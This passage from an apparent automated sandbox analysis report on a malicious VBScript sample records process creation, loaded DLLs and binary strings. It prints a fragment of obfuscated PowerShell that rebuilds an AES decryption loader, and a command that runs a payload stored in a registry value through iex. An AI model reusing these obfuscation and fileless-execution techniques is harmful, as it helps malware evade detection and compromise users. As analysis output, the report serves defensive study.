tiw6l(0x00<#A7hB6#>,0x00<#O0RD9#>,0x00<#jXCyJ#>,0x00<#OM184#>); $iSxCm = tiw6l(0x45<#OOD4N#>,0x00<#ImgSK#>,0x00<#Ylexb#>,0x00<#UUo0E#>); $l8XQf = tiw6l(0x03<#CQs75#>,0x00<#GS7w6#>,0x00<#gTbLR#>,0x00<#o3nyw#>); $kzu3X = $null; function S2qwV($ti34n) {Invoke-Expression -Verbose -Debug -WarningAction Inquire 'Bqr$BqrEBqrLBqrpBqrtBqrFBqr=Bqr[BqrSBqryBqrsBqrtBqreBqrmBqr.BqrSBqreBqrcBqruBqrrBqriBqrtBqryBqr.BqrCBqrrBqryBqrpBqrtBqroBqrgBqrrBqraBqrpBqrhBqryBqr.BqrABqreBqrsBqr]Bqr:Bqr:BqrCBqrrBqreBqraBqrtBqreBqr(Bqr)Bqr;Bqr'.Replace('Bqr', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore 'l3m$l3mEl3mLl3mpl3mtl3mFl3m.l3mMl3mol3mdl3mel3m=l3m[l3mSl3myl3msl3mtl3mel3mml3m.l3mSl3mel3mcl3mul3mrl3mil3mtl3myl3m.l3mCl3mrl3myl3mpl3mtl3mol3mgl3mr
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $r = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\Microsoft\Windows'); iex $r.GetValue('elnlg')
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: test.vbs | Static file information: File size 1324656 > 1048576
Source: Binary string: C:\Users\swagkek\source\repos\AntiVM\obj\Release\abc.pdb source: powershell.exe, 00000005.00000002.1372476794.0000027F80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F804DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1392320209.0000027FFEAD0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1372476794.0000027F8181B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed/gma.system.mousekeyhook]costura.gma.system.mousekeyhook.dll.compressed source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\projects\globalmousekeyhook\MouseKeyHook\obj\Debug\Gma.System.MouseKeyHook.pdb source: powershell.exe, 00000008.00000002.2815168012.0000022560390000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000008.00000002.2591788897.00000225487FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256 source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000008.00000002.2741051863.0000022557D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2815409363.00000225603A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2741051863.000002255777C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: powershell.exe, 00000008.00000002.2741051863.00000225574F3000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

